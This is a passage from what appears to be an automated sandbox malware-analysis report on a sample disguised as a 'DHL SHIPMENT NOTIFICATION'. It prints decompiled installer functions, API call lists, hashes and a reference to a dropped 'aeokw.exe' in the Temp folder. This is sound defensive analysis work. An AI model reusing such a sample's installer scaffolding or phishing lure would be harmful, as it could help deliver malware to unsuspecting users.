                        • API String ID: 4260037668-4144669903
                        • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                        • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                        • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                        • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                        0x00404643
                        0x004046f9
                        0x00000000
                        0x004046f9
                        0x00404654
                        0x00404658
                        0x00000000
                        0x00404672
                        0x00404672
                        0x0040467b
                        0x00000000
                        0x00000000
                        0x0040467d
                        0x00404689
                        0x0040468c
                        0x0040468c
                        0x00404692
                        0x00404698
                        0x00404698
                        0x004046a4
                        0x004046aa
                        0x004046b1
                        0x004046b4
                        0x004046b7
                        0x004046b9
                        0x004046b9
                        0x004046c1
                        0x004046c7
                        0x004046c7
                        0x004046d1
                        0x004046d6
                        0x004046d9
                        0x004046de
                        0x004046e1
                        0x004046e1
                        0x004046f1
                        0x004046f1
                        0x00000000
                        0x004046f4

                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
                        • GetSysColor.USER32(00000000), ref: 0040468C
                        • SetTextColor.GDI32(?,00000000), ref: 00404698
                        • SetBkMode.GDI32(?,?), ref: 004046A4
                        • GetSysColor.USER32(?), ref: 004046B7
                        • SetBkColor.GDI32(?,?), ref: 004046C7
                        • DeleteObject.GDI32(?), ref: 004046E1
                        • CreateBrushIndirect.GDI32(?), ref: 004046EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                        0x004026ec
                        0x004026ee
                        0x004026f1
                        0x004026f3
                        0x004026f6
                        0x004026fb
                        0x004026ff
                        0x00402702
                        0x00402705
                        0x00402c2a
                        0x00402c2d
                        0x0040270b
                        0x0040270b
                        0x00402712
                        0x00402714
                        0x00402714
                        0x0040271a
                        0x0040287e
                        0x0040287e
                        0x00402881
                        0x00402886
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00000000
                        0x00402720
                        0x00402721
                        0x0040272c
                        0x0040272f
                        0x0040273b
                        0x0040273f
                        0x004027d7
                        0x004027ef
                        0x004027ff
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402745
                        0x00402745
                        0x00402748
                        0x00402749
                        0x0040274c
                        0x00402751
                        0x00402758
                        0x00402760
                        0x00000000
                        0x00402766
                        0x00402766
                        0x0040276b
                        0x00000000
                        0x00402771
                        0x00402771
                        0x00402779
                        0x0040277c
                        0x0040277f
                        0x0040283a
                        0x00402841
                        0x00402785
                        0x0040278b
                        0x00402797
                        0x00402801
                        0x00402801
                        0x00402799
                        0x00402799
                        0x0040279c
                        0x0040279e
                        0x0040279e
                        0x0040279e
                        0x004027a1
                        0x004027a6
                        0x004027a9
                        0x00000000
                        0x00000000
                        0x004027ab
                        0x004027ae
                        0x004027bc
                        0x004027c2
                        0x004027d0
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d0
                        0x0040279e
                        0x00402804
                        0x00402807
                        0x00000000
                        0x00402809
                        0x0040280e
                        0x0040284f
                        0x00402871
                        0x00402878
                        0x0040285d
                        0x0040285d
                        0x00402860
                        0x00402863
                        0x00402866
                        0x00402866
                        0x00000000
                        0x00402817
                        0x00402817
                        0x0040281a
                        0x0040281d
                        0x00402823
                        0x00402827
                        0x0040282a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040282a
                        0x0040280e
                        0x00402807
                        0x0040277f
                        0x0040276b
                        0x00402760
                        0x00000000
                        0x0040282c
                        0x0040282c
                        0x0040282f
                        0x00402838
                        0x00000000
                        0x0040272f
                        0x0040271a
                        0x00402c33
                        0x00402c39

                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                        • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                        • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                        • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                        0x004056d6
                        0x004056e0
                        0x004056e5
                        0x004056eb
                        0x004056f6
                        0x004056f9
                        0x004056fc
                        0x00405702
                        0x00405702
                        0x00405708
                        0x00405710
                        0x00405713
                        0x00405730
                        0x00405734
                        0x0040573d
                        0x0040573d
                        0x00405747
                        0x00405750
                        0x0040575c
                        0x00405763
                        0x00405767
                        0x0040576a
                        0x0040577d
                        0x0040578b
                        0x0040578b
                        0x0040578f
                        0x00405791
                        0x00405794
                        0x00000000
                        0x00405794
                        0x00405715
                        0x0040571d
                        0x00405725
                        0x0040572b
                        0x00000000
                        0x0040572b
                        0x00405725
                        0x00405713
                        0x004057a0

                        APIs
                        • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                        • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                        • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                        • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                          • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID:
                        • API String ID: 1495540970-0
                        • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                        • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                        • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                        • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                        0x004068f7
                        0x00406900
                        0x00406917
                        0x00406917
                        0x0040691e
                        0x0040692a
                        0x0040692a
                        0x0040692d
                        0x00406930
                        0x00406935
                        0x00406937
                        0x00406940
                        0x00406944
                        0x00406961
                        0x00406969
                        0x00406969
                        0x0040696e
                        0x00406970
                        0x00406973
                        0x00406978
                        0x00406979
                        0x0040697d
                        0x0040697d
                        0x0040697e
                        0x00406985
                        0x00406987
                        0x0040698e
                        0x00000000
                        0x00000000
                        0x00406996
                        0x0040699c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040699c
                        0x004069a1

                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                        • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                        • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                        • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-4010320282
                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}







                        0x0040303d
                        0x0040303f
                        0x00403046
                        0x00403049
                        0x00403049
                        0x0040304f
                        0x00000000
                        0x0040304f
                        0x0040305d
                        0x00000000
                        0x00403060
                        0x00403067
                        0x00403073
                        0x0040307b
                        0x004030b9
                        0x004030c2
                        0x00000000
                        0x004030c7
                        0x00403084
                        0x00403095
                        0x00000000
                        0x004030a3
                        0x00403084
                        0x004030cf

                        APIs
                        • DestroyWindow.USER32(?,00000000), ref: 00403049
                        • GetTickCount.KERNEL32 ref: 00403067
                        • wsprintfW.USER32 ref: 00403095
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                        • CreateDialogParamW.USER32 ref: 004030B9
                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                          • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                        • String ID: ... %d%%
                        • API String ID: 722711167-2449383134
                        • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                        • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                        • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                        • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
